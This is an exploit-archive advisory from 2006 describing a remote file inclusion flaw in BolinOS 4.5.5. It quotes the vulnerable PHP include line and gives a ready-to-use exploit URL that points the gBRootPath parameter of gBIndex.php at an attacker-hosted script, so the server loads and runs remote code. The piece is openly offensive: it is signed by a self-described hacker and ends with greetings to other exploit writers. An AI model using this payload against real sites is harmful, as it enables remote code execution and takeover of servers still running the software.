BolinOS <= 4.5.5 (gBRootPath) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BolinOS <= 4.5.5 (gBRootPath) Remote File Include Vulnerability
# Published : 2006-09-15
# Author : xoron
# Previous Title : Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability
# Next Title : PHP DocWriter <= 0.3 (script) Remote File Include Exploit

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Class : Remote
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Vuln Code: include ($GLOBALS["gBRootPath"].$GLOBALS["gBSysPath"]."/system/_b/contentFiles/gBLib.php");
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Exploit: http://www.site.com/[script path]/system/_b/contentFiles/gBIndex.php?gBRootPath=evil_scripts?
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+ Thanx : str0ke, Ironfist, Preddy, SHiKaA, mdx, gültekin, R3D4C!D, DaRK, insomnia, mirim, Dreamlord,
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

# www.Syue.com [2006-09-15]